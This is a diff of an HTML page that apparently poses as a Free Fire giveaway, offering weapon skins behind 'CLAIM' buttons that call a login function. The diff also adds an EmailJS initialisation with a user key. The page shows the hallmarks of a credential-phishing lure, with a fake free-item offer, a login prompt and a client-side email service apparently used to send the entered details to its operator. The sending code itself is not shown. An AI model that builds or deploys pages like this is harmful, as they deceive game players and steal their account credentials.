--- a/id/evogun/index.html
+++ b/id/evogun/index.html
@@ -8,21 +8,25 @@
 <script src="main.js"></script>
 </head>
 <body>
-	<center>
-		<img src="FreeFire.png" width="200" height="100">
-	</center>
-	<center>
-	<img width="200" height="100" src="akdraco.png">
-	<center><button onclick="login()">CLAIM</button></center>
-	<img width="200" height="100" src="mp40cobra.jpg">
-	<center><button onclick="login()">CLAIM</button></center>
-	<img width="200" height="100" src="sgEvo.jpg">
-	<center><button onclick="login()">CLAIM</button></center>
-	<img width="200" height="140" src="xm8Evo.jpg">
-	<center><button onclick="login()">CLAIM</button></center>
-	<img width="200" height="100" src="umpEvo.jpg">
-	<center><button onclick="login()">CLAIM</button></center>
-	</center>
-	<center>
+<center>
+<img src="FreeFire.png" width="200" height="100">
+</center>
+<center>
+<img width="200" height="100" src="akdraco.png">
+<center><button onclick="login()">CLAIM</button></center>
+<img width="200" height="100" src="mp40cobra.jpg">
+<center><button onclick="login()">CLAIM</button></center>
+<img width="200" height="100" src="sgEvo.jpg">
+<center><button onclick="login()">CLAIM</button></center>
+<img width="200" height="140" src="xm8Evo.jpg">
+<center><button onclick="login()">CLAIM</button></center>
+<img width="200" height="100" src="umpEvo.jpg">
+<center><button onclick="login()">CLAIM</button></center>
+</center>
+<script>
+(function() {
+     emailjs.init('user_Uo3DWO4lfQjwUkIRdJDxU');
+})();
+</script>
 </body>
 </html>
